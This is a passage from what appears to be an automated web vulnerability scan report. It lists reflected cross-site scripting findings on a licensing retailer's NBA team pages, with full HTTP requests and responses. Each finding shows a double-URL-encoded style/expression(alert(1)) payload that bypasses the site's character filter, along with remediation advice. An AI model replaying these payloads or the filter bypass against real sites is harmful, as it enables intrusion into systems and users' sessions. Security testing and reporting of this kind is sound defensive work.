This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/new_orleans_hornets?9d44a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272283fff6c79=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:15 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:17 GMT
NS_RTIMER_COMPOSITE: 778927872:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=RYycMyTJJkZl0RtTYP0LgS17yLTZPcyc3WRHH1M21DQB11wmGSK7qXxJgVD1mrWfj7C3m70H2HH2rrf5LBHpZJ5ycQSHXNT3dvvKdN1ptZQXn901vXGLmBXHpwt81Jvd!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:26 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=589
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100588


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Orleans Hornets</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144140&9d44a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272283fff6c79=1&9d44a'style='x:expression(alert(1))'2283fff6c79=1&fromsla=T&9d44a%27style%3d%27x%3aexpression%28alert%281%29%29%272283fff6c79=1'>
...[SNIP]...

1.41. http://www.turnerlicensing.com/NBA/new_york_knicks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/new_york_knicks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18049%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a326d28a6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18049'style='x:expression(alert(1))'a326d28a6dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/new_york_knicks?18049%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a326d28a6dd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:11 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:13 GMT
NS_RTIMER_COMPOSITE: 1222827214:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=TdyqMyTQzLmyJqP9bSDpmLGymr3QNftB7MMkztvdLvJrHyprCT4ky6v75qdTnvLJRTnvNxcJV2cW05HPWdVJwgwwDyGrL9T1MCG1RwcjW8GFGF3qdJpw350h9HhQ1nq1!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:22 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=998
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89480


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New York Knicks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
nsing.com/s.nl?sc=69&category=144141&18049%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a326d28a6dd=1&18049%27style%3d%27x%3aexpression%28alert%281%29%29%27a326d28a6dd=1&fromsla=T&18049'style='x:expression(alert(1))'a326d28a6dd=1'>
...[SNIP]...

1.42. http://www.turnerlicensing.com/NBA/oklahoma_thunder [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/oklahoma_thunder

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba37e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270e97dc019c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba37e'style='x:expression(alert(1))'0e97dc019c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/oklahoma_thunder?ba37e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270e97dc019c4=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:34:35 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:34:38 GMT
NS_RTIMER_COMPOSITE: -1931575386:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=CTT1MyJdMTl6ppjs7bX9tJYf1QGMbFpsQwjtGPsGMwnnFGmnBD7ZmL0xV2MLB5F5JHBhFrsNSQLBn4HwLwzXh2X0cWJpJBFPLhh0GLn1hhqRX12wyHvsz1rGcqQ2G2T0!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:35:13 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=985
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 62096


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Oklahoma Thunder</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144159&ba37e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270e97dc019c4=1&ba37e%27style%3d%27x%3aexpression%28alert%281%29%29%270e97dc019c4=1&ba37e'style='x:expression(alert(1))'0e97dc019c4=1&fromsla=T'>
...[SNIP]...

1.43. http://www.turnerlicensing.com/NBA/orlando_magic [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/orlando_magic

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fc6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e1d7e340077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc6ff'style='x:expression(alert(1))'e1d7e340077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/orlando_magic?fc6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e1d7e340077=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:09 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:12 GMT
NS_RTIMER_COMPOSITE: -1254862160:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=zb09MyTPWyKqrm8PyPP2BPvcpLT2jyR0JKypLR82BlTfrTp4pNdBdRNxxGyq59vnp1wxyPB4D2n141DhMtW79J1TyBm5Tz27nvLGGg143p4KDZyMJYvC2lqzTP4Syt7y!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:18 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 72995


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Orlando Magic</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144142&fc6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e1d7e340077=1&fc6ff%27style%3d%27x%3aexpression%28alert%281%29%29%27e1d7e340077=1&fc6ff'style='x:expression(alert(1))'e1d7e340077=1&fromsla=T'>
...[SNIP]...

1.44. http://www.turnerlicensing.com/NBA/philadelphia_76ers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/philadelphia_76ers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91094%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527037823385a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91094'style='x:expression(alert(1))'037823385a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/philadelphia_76ers?91094%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527037823385a2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:12 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:14 GMT
NS_RTIMER_COMPOSITE: -270587362:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=j99cMyTRmjL1bh9sRZ1l0Q1VTkwPLcBDntQnQnvGlQLZgZ0gsjTm8CwymczD25gsbZQLzw6Wr1hwfDyJmYLRGJlJLKzWGh87TGhrVGQGq4XzmTZ6dyCQQcSKjp2n1KlM!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:23 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=962
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89545


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Philadelphia 76ers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144143&91094%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527037823385a2=1&91094%27style%3d%27x%3aexpression%28alert%281%29%29%27037823385a2=1&91094'style='x:expression(alert(1))'037823385a2=1&fromsla=T'>
...[SNIP]...

1.45. http://www.turnerlicensing.com/NBA/phoenix_suns [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/phoenix_suns

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c7aca%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527118be204132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7aca'style='x:expression(alert(1))'118be204132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/phoenix_suns?c7aca%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527118be204132=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:18 GMT
NS_RTIMER_COMPOSITE: -264694912:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=m8zdMyTV9fn8b2YTfLNtrJydnytTm6TJtkVLQHWhJnFFTpwJLqG2QTY34pJHWvTDgX2TTkFfSxMqkPyL1cLxLzbgTMHMccgxnQPJkHZs2vnsdpLGRphhB2pF1yw6YNG1!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:28 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=802
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94793


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Phoenix Suns</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144147&c7aca%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527118be204132=1&c7aca%27style%3d%27x%3aexpression%28alert%281%29%29%27118be204132=1&c7aca'style='x:expression(alert(1))'118be204132=1&fromsla=T'>
...[SNIP]...

1.46. http://www.turnerlicensing.com/NBA/portland_trail_blazers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/portland_trail_blazers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8dc4e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d08698a97ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8dc4e'style='x:expression(alert(1))'d08698a97ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/portland_trail_blazers?8dc4e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d08698a97ec=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:12 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:13 GMT
NS_RTIMER_COMPOSITE: 1558473266:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=QcWpMyTR5JsKM12rqynCJF3qQPYBFQcQNGyk38nGp25XgwGH8M573K1W4sLNjhGjKvw3SF2lTCP9WvVH19zgF24yZTLcc70fXvJ6MTymVJz89yByHhW8HBp2LLw9MGyh!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:22 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89670


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Portland Trail Blazers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading..
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144148&8dc4e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d08698a97ec=1&8dc4e%27style%3d%27x%3aexpression%28alert%281%29%29%27d08698a97ec=1&8dc4e'style='x:expression(alert(1))'d08698a97ec=1&fromsla=T'>
...[SNIP]...

1.47. http://www.turnerlicensing.com/NBA/sacramento_kings [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/sacramento_kings

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7b27%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dbda3da870d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7b27'style='x:expression(alert(1))'dbda3da870d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/sacramento_kings?a7b27%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dbda3da870d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:26 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:28 GMT
NS_RTIMER_COMPOSITE: 1222832372:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=ygp7MyTfTk6pMh3yTnBv4gZP2pwZPKR11jvfrcRGpQgvCk1F6y1T0nRlsDkCmh1RQjYFD0phYk80Zvd3d1n1pQ4Pghx9mh00WT3pMMwyppgmnrHCZnTxgC1kLGs2r35j!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=787
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89456


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Sacramento Kings</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144149&a7b27%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dbda3da870d=1&a7b27'style='x:expression(alert(1))'dbda3da870d=1&a7b27%27style%3d%27x%3aexpression%28alert%281%29%29%27dbda3da870d=1&fromsla=T'>
...[SNIP]...

1.48. http://www.turnerlicensing.com/NBA/san_antonio_spurs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/san_antonio_spurs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7529%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795ef547ec66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7529'style='x:expression(alert(1))'95ef547ec66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/san_antonio_spurs?f7529%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795ef547ec66=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:32 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:33 GMT
NS_RTIMER_COMPOSITE: -708590386:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=0zSXMyJGThtbXBC1TZfLYx4mhSG4qW9221kHnjrmvh0hJBjhRJgT7LG7MMptGDP4kzcVwB1vR1pFggGpznQh2KnrVtmzK2xpHT2cbXDc1v7r2tpKkDXJCpLrQRVdgT4q!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:53 GMT; path=/
